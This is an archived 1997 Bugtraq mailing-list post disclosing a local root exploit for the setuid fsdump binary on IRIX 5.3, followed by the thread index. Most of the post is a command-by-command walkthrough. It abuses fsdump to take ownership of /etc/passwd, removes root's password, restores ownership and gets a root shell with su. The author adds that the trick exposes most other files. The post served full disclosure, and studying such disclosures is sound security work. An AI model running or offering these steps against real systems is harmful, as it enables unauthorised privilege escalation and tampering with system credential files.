Bugtraq mailing list archives
IRIX 5.3 /var/rfindd/fsdump - exploit
From: csh () VIEWGRAPHICS COM (Chris Sheldon)
Date: Tue, 25 Feb 1997 06:33:13 -0800
Ok. Well, yet another IRIX 5.3 root exploit. Of course, the major problem here is that IRIX allow users to give away ownership of files. Without that, this could only be used for changing the permissions on file so that you could read and modify. The system (an Indy): IRIX irix 5.3 11091812 IP22 mips irix% ls -la /var/rfindd/fsdump ---s--x--x 1 root sys 62032 Jul 25 1995 /var/rfindd/fsdump What tipped me off that it was exploitable was the fact that it was a protected suid binary (---s--x--x). I thought: if someone at SGI is being careful to not let non-root users read the binary, then it *must* be packed with holes... :-) So, I'm just a normal user today... irix% id uid=1799(csh) gid=500(users) irix% /var/rfindd/fsdump -L/etc/passwd -F/tmp/dump / (count to three, and hit ctrl-c) irix% ls -la /etc/passwd -rw-r--r-- 1 csh users 956 Feb 25 06:23 /etc/passwd And now I've got root access... irix% tail -8 /etc/passwd nobody:*:60001:60001:SVR4 nobody uid:/dev/null:/dev/null noaccess:*:60002:60002:uid no access:/dev/null:/dev/null nobody:*:-2:-2:original nobody uid:/dev/null:/dev/null Tue Feb 25 06:23:48 PST 1997 Number of inodes total 208740; allocated 31259 Collecting garbage. interrupted All you have to do is edit off the garbage from the passwd file, delete the encrypted root password and reset the perms on the passwd file. irix% vi /etc/passwd # remove the encrypted root password irix% chgrp sys /etc/passwd irix% chown root /etc/passwd irix% su - irix# That's it. (Heck, you don't even have to remove the garbage from the passwd file.) This can be used to access pretty much any file on the system which is currently group owned... fun, fun, fun until SGI takes the bugs away... ;-) (right)
Current thread:
- Security hole in Solaris 2.5 (sdtcm_convert) + exploit Cristian SCHIPOR (Feb 22)
- Re: Security hole in Solaris 2.5 (sdtcm_convert) + exploit Casper Dik (Feb 22)
- <Possible follow-ups>
- Re: Security hole in Solaris 2.5 (sdtcm_convert) + exploit Adam Morrison (Feb 23)
- Re: Security hole in Solaris 2.5 (sdtcm_convert) + exploit Shumon Huque (Feb 23)
- Re: Security hole in Solaris 2.5 (sdtcm_convert) + exploit Brian Parent (Feb 24)
- CIAC Bulletin H-32: HP-UX ppl Core Dump Vulnerability Aleph One (Feb 24)
- IRIX 5.3 /var/rfindd/fsdump - exploit Chris Sheldon (Feb 25)
- Re: IRIX 5.3 /var/rfindd/fsdump - exploit Yuri Volobuev (Feb 25)
- Re[2]: [NTSEC] ! [ADVISORY] Major Security Hole in MS ASP daragh_malone () TELECOM IE (Feb 25)
- ** >= Ascend 5.0A SECURITY ALERT ** Kit Knox (Feb 26)
- Re: Security hole in Solaris 2.5 (sdtcm_convert) + exploit Shumon Huque (Feb 23)
- libX11 David Sacerdote (Feb 24)